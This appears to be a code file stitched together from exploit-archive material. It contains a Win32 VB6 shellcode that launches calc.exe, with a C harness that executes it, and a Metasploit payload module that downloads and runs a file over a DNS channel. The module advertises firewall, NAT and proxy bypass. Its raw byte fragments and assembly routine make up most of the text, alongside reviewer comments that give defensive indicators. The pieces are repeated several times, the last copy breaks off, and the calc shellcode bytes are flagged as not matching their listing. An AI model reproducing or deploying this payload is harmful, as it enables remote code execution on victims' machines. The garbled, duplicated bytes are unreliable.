00401946 . 50 | PUSH EAX
00401947 . FF15 34104000 | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell
0040194D . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401950 . DDD8 | FSTP ST
00401952 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
00401958 . 8975 FC | MOV DWORD PTR SS:[EBP-4],ESI
0040195B . 9B | WAIT
0040195C . 68 6E194000 | PUSH k3d4n5.0040196E
00401961 . EB 0A | JMP SHORT k3d4n5.0040196D
00401963 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401966 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
0040196C . C3 | RETN
*/
/*
 * Not position-independent shellcode: this is a byte dump of the compiled
 * VB6 routine disassembled above, and it keeps that binary's absolute
 * addresses (the SEH thunk pushed as 0x00401096, k3d4n5.00401080, the IAT
 * slots read via FF 15 at 0x00401068/0x00401034/0x00401008). Outside that
 * exact executable at its original image base these bytes reference
 * nothing valid; treat the array as a disassembly reference only.
 * NOTE(review): the array also disagrees with the listing in places --
 * after the FS:[0] store the bytes "\x00\x40\x18\xF9" match the address
 * column "004018F9" rather than any instruction, the FF 15 34 10 40 00
 * call appears here as "\xFF\x15\x34\x10\x00" with a byte missing, and
 * the PUSH at 0040195C is "\x68\x41\x42\x43\x40\x44" instead of
 * 68 6E 19 40 00. The "149 Bytes" figure is the author's and, given the
 * above, is not verified here.
 */
char SEH[] =
"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"
"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"
"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"
"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"
"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"
"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"
"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"
"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";
/*
 * Harness: calls the bytes in `SEH` as an int-returning function and
 * discards the result. Calling a data array is undefined behaviour in C and
 * needs executable memory, which DEP/NX denies for a writable global; the
 * bytes themselves carry absolute addresses into another executable, so
 * there is nothing meaningful for them to do here. argc/argv are unused;
 * main ends without a return statement, which C99 treats as returning 0.
 */
int main(int argc, char **argv)
{
    int (*entry)(void) = (int (*)(void))SEH;

    (void)entry();
}
/*
VB6_vbaExceptHandler - SEH (calc.exe) ShellCode
# =========[ Sh31LC0d3.C ]=====>
/*
###
# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Win32
# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
# Tested on : Windows XP SP3 France
###
*/
// TesT Project >> Compile As Name k3d4n5.exe <<
/*
004018E0 > 55 | PUSH EBP
004018E1 . 8BEC | MOV EBP,ESP
004018E3 . 83EC 0C | SUB ESP,0C
004018E6 . 68 96104000 | PUSH <JMP.&MSVBVM60.__vbaExceptHandler> ; SE handler installation (SEH)
004018EB . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]
004018F1 . 50 | PUSH EAX
004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP
004018F9 . 83EC 30 | SUB ESP,30
004018FC . 53 | PUSH EBX
004018FD . 56 | PUSH ESI
004018FE . 57 | PUSH EDI
004018FF . 8965 F4 | MOV DWORD PTR SS:[EBP-C],ESP
00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080
00401909 . 8B45 08 | MOV EAX,DWORD PTR SS:[EBP+8]
0040190C . 8BC8 | MOV ECX,EAX
0040190E . 83E1 01 | AND ECX,1
00401911 . 894D FC | MOV DWORD PTR SS:[EBP-4],ECX
00401914 . 24 FE | AND AL,0FE
00401916 . 50 | PUSH EAX
00401917 . 8945 08 | MOV DWORD PTR SS:[EBP+8],EAX
0040191A . 8B10 | MOV EDX,DWORD PTR DS:[EAX]
0040191C . FF52 04 | CALL DWORD PTR DS:[EDX+4]
0040191F . 33F6 | XOR ESI,ESI
00401921 . 8D55 CC | LEA EDX,DWORD PTR SS:[EBP-34]
00401924 . 8975 CC | MOV DWORD PTR SS:[EBP-34],ESI
00401927 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
0040192A . 8975 DC | MOV DWORD PTR SS:[EBP-24],ESI
0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe
00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8
0040193B . FF15 68104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup
00401941 . 8D45 DC | LEA EAX,DWORD PTR SS:[EBP-24]
00401944 . 6A 02 | PUSH 2
00401946 . 50 | PUSH EAX
00401947 . FF15 34104000 | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell
0040194D . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401950 . DDD8 | FSTP ST
00401952 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
00401958 . 8975 FC | MOV DWORD PTR SS:[EBP-4],ESI
0040195B . 9B | WAIT
0040195C . 68 6E194000 | PUSH k3d4n5.0040196E
00401961 . EB 0A | JMP SHORT k3d4n5.0040196D
00401963 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401966 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
0040196C . C3 | RETN
*/
/*
 * Not position-independent shellcode: this is a byte dump of the compiled
 * VB6 routine disassembled above, and it keeps that binary's absolute
 * addresses (the SEH thunk pushed as 0x00401096, k3d4n5.00401080, the IAT
 * slots read via FF 15 at 0x00401068/0x00401034/0x00401008). Outside that
 * exact executable at its original image base these bytes reference
 * nothing valid; treat the array as a disassembly reference only.
 * NOTE(review): the array also disagrees with the listing in places --
 * after the FS:[0] store the bytes "\x00\x40\x18\xF9" match the address
 * column "004018F9" rather than any instruction, the FF 15 34 10 40 00
 * call appears here as "\xFF\x15\x34\x10\x00" with a byte missing, and
 * the PUSH at 0040195C is "\x68\x41\x42\x43\x40\x44" instead of
 * 68 6E 19 40 00. The "149 Bytes" figure is the author's and, given the
 * above, is not verified here.
 */
char SEH[] =
"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"
"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"
"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"
"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"
"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"
"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"
"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"
"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";
/*
 * Harness: calls the bytes in `SEH` as an int-returning function and
 * discards the result. Calling a data array is undefined behaviour in C and
 * needs executable memory, which DEP/NX denies for a writable global; the
 * bytes themselves carry absolute addresses into another executable, so
 * there is nothing meaningful for them to do here. argc/argv are unused;
 * main ends without a return statement, which C99 treats as returning 0.
 */
int main(int argc, char **argv)
{
    int (*entry)(void) = (int (*)(void))SEH;

    (void)entry();
}
/*
Monday, August 08, 2011
download & execute file via reverse DNS channel
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# does not work on XP/2003 because there is no IPv6 by default.
# can work in XP/2003 if IPv6 installed
# (it does not need to be enabled, just installed)
require 'msf/core'
# Metasploit single-stage x86 Windows payload. The raw bytes live in the
# 'Payload' hash of the module info; generate_stage only splices the DOMAIN
# and FILE options into fixed slots between the three fragments. Per the
# header, the transport is DNS lookups made through getaddrinfo rather than
# a socket the payload owns -- which is also why, for defenders, the
# observable artefact is outbound DNS traffic for the configured domain
# (plus the plaintext API/DLL names noted on 'Begin') rather than a
# connection from the payload's own process.
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
# Entry stub plus a 0xFF-separated table of names in clear ASCII:
# GetProcAddress, GetTempPathA, WinExec, ExitThread, LoadLibraryA, ws2_32,
# WSAStartup, getaddrinfo, msvcrt, fopen, fwrite, fclose. Because these
# strings are unencoded they are a usable static signature for the payload.
# The DOMAIN slot is appended directly after this fragment.
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
# NOTE(review): reads like the resolver -- fs:[0x30] (PEB) is loaded early
# and the names above are matched against an export table -- followed by
# the calls that load ws2_32/msvcrt; inferred from the opcodes, not
# verified. The FILE slot is appended directly after this fragment.
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
# Per the header and the names resolved above: issues the DNS queries,
# writes the answer data to a file under the temp path and runs it via
# WinExec; the last fragment contains the ASCII "cmd /c " prefix in clear.
# Not decoded instruction by instruction here.
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
# The "9 bytes - maximum" limit on DOMAIN is documentation only; nothing in
# this module checks the length of either option (see generate_stage).
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
# Returns the concatenation Begin + domain slot + Payload1 + extension slot
# + Payload2. Both slots are fixed-width: the extension is padded to 4
# bytes and the domain to 10 bytes, and the stub reads them at fixed
# offsets, so an over-long DOMAIN or FILE value would shift everything
# after it (unchecked here).
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
# Extension slot: right-pad with \x01 to 4 bytes, then add 1 to each of
# the original characters (the stub presumably undoes the shift before
# use -- TODO confirm in the bytes). Note the in-place []= mutates the
# string object obtained from the datastore when no padding copy was made.
extLen=extens.length
while extens.length<4
extens=extens+"\x01"
end
i=0
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
# Domain slot: right-pad with \xFF to 10 bytes and prefix a '.' (0x2e).
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# does not work on XP/2003 because there is no IPv6 by default.
# can work in XP/2003 if IPv6 installed
# (it does not need to be enabled, just installed)
require 'msf/core'
# Metasploit single-stage x86 Windows payload. The raw bytes live in the
# 'Payload' hash of the module info; generate_stage only splices the DOMAIN
# and FILE options into fixed slots between the three fragments. Per the
# header, the transport is DNS lookups made through getaddrinfo rather than
# a socket the payload owns -- which is also why, for defenders, the
# observable artefact is outbound DNS traffic for the configured domain
# (plus the plaintext API/DLL names noted on 'Begin') rather than a
# connection from the payload's own process.
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
# Entry stub plus a 0xFF-separated table of names in clear ASCII:
# GetProcAddress, GetTempPathA, WinExec, ExitThread, LoadLibraryA, ws2_32,
# WSAStartup, getaddrinfo, msvcrt, fopen, fwrite, fclose. Because these
# strings are unencoded they are a usable static signature for the payload.
# The DOMAIN slot is appended directly after this fragment.
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
# NOTE(review): reads like the resolver -- fs:[0x30] (PEB) is loaded early
# and the names above are matched against an export table -- followed by
# the calls that load ws2_32/msvcrt; inferred from the opcodes, not
# verified. The FILE slot is appended directly after this fragment.
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
# Per the header and the names resolved above: issues the DNS queries,
# writes the answer data to a file under the temp path and runs it via
# WinExec; the last fragment contains the ASCII "cmd /c " prefix in clear.
# Not decoded instruction by instruction here.
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
# The "9 bytes - maximum" limit on DOMAIN is documentation only; nothing in
# this module checks the length of either option (see generate_stage).
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
# Returns the concatenation Begin + domain slot + Payload1 + extension slot
# + Payload2. Both slots are fixed-width: the extension is padded to 4
# bytes and the domain to 10 bytes, and the stub reads them at fixed
# offsets, so an over-long DOMAIN or FILE value would shift everything
# after it (unchecked here).
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
# Extension slot: right-pad with \x01 to 4 bytes, then add 1 to each of
# the original characters (the stub presumably undoes the shift before
# use -- TODO confirm in the bytes). Note the in-place []= mutates the
# string object obtained from the datastore when no padding copy was made.
extLen=extens.length
while extens.length<4
extens=extens+"\x01"
end
i=0
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
# Domain slot: right-pad with \xFF to 10 bytes and prefix a '.' (0x2e).
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
download & execute file via reverse DNS channel
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# does not work on XP/2003 because there is no IPv6 by default.
# can work in XP/2003 if IPv6 installed
# (it does not need to be enabled, just installed)
require 'msf/core'
# Metasploit single payload: the stub fragments below are concatenated with
# the DOMAIN and FILE options by generate_stage into one raw byte string.
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
# Registers module metadata, the raw payload fragments and the two options
# (DOMAIN, FILE) that generate_stage reads from the datastore.
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
# 'Begin' embeds, as plain ASCII separated by 0xFF, the library and API
# names GetProcAddress, GetTempPathA, WinExec, ExitThread, LoadLibraryA,
# ws2_32, WSAStartup, getaddrinfo, msvcrt, fopen, fwrite and fclose
# (presumably resolved at run time). These cleartext names are the obvious
# static indicator for this payload.
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
# 'Payload1' follows the DOMAIN field and precedes the FILE field (see
# generate_stage); its contents are opaque machine code from this view.
